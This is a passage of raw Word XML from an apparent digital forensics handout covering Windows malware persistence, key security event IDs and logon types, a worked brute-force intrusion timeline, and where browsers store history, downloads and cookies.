                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">svchost32.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is a look-alike, and the folder </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Users\Public</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is a place any user can write to — not where genuine system programs live. A RunOnce entry makes it start once at next logon. This is a typical malware </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">persistence</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masquerading</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> technique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows records system and security events in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">event logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, saved as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.evtx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> files in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\winevt\Logs\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each event has an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Event ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a timestamp, a source, a user and details. They are viewed with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Event Viewer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, parsed with tools like EvtxECmd, or loaded into a SIEM such as Splunk.</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Log</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Contents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Security</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Logons and logoffs, failed logons, account creation and changes, privilege use, object access, policy changes (depends on the audit policy)</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System</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Operating-system and driver events, service start/stop, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">new service installed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, shutdowns and restarts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Application</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Events from installed programs and some security tools (antivirus alerts, application crashes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Important event IDs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462"/>
        <w:gridCol w:w="1754"/>
        <w:gridCol w:w="6530"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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Log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="653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4624</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Successful logon (look at the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Logon Type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> field)</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4625</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Failed logon — many in a row from one source = brute force</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4634 / 4647</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Logoff</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4648</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Logon using explicit credentials (e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">runas</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, lateral movement)</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4672</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Special privileges assigned to a new logon (administrator-level)</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4688</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New process created (needs auditing enabled)</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4720</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user account was created</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4722 / 4724 / 4726</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Account enabled / password reset / account deleted</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4728 / 4732 / 4756</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member was added to a security-enabled group (global / local / universal)</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4768 / 4769</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Kerberos ticket requested (authentication / service ticket)</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4776</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NTLM authentication attempt</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4698</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scheduled task was created (persistence)</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1102</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audit log was </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cleared</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — a strong sign of cover-up</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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7045</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">new service was installed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — common after malware or remote tools are installed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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104</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 log cleared</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Logon types (field inside Event 4624/4625)</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170"/>
        <w:gridCol w:w="2924"/>
        <w:gridCol w:w="5652"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="565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rPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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Interactive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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logged on at the keyboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="565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Accessed a shared folder or resource over the network (SMB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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 / 5</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Batch / Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Scheduled task or service started</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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Unlock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="565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Workstation unlocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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RemoteInteractive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Remote Desktop (RDP) session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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11</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CachedInteractive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="565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Logon using cached domain credentials (offline)</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Reading the events</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">847 × Event 4625 in 3 minutes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> from 10.0.0.55 for account </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Administrator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> → a brute-force password attack.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Followed by </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">one Event 4624, Type 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the same IP → the attack apparently succeeded.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Then </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">4720 (account created)</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4732 (added to Administrators)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> → the attacker created a backdoor account.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Then </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">7045 (new service)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> → software installed for persistence.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A Type 3 logon at 03:00 AM by the Administrator account from a workstation IP is suspicious because administrators rarely work at that hour and workstations normally do not log on to other machines over the network — possible lateral movement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Browser Artefacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Web browsers store a lot about user activity. Chrome and Edge (both Chromium-based) keep their data in the user profile at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\&lt;user&gt;\AppData\Local\Google\Chrome\User Data\Default\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Edge: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft\Edge\User Data\Default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Firefox uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AppData\Roaming\Mozilla\Firefox\Profiles\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Most data is kept in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite database files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be opened with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DB Browser for SQLite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or analysed automatically by Autopsy’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Web History</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> module.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Artefact</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Contents</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History</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Visited URLs, page titles, visit counts and times (Chrome: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">History</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> file — tables </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">urls</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visits</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; Firefox: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">places.sqlite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)</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which sites were visited and when — phishing sites, cloud storage, search terms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Downloads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name, source URL, save location, start/end time</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Proves that a malicious file was downloaded and where it went</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Cache</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Saved copies of web pages, images and scripts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Can show the content the user actually saw</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Cookies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Session and tracking data per site</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past logins and visits; may include session tokens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Saved logins / autofill</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Usernames and (encrypted) passwords; form entries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accounts used by the person</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Search terms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Stored in the URL history</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user intent, e.g. “how to delete logs”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
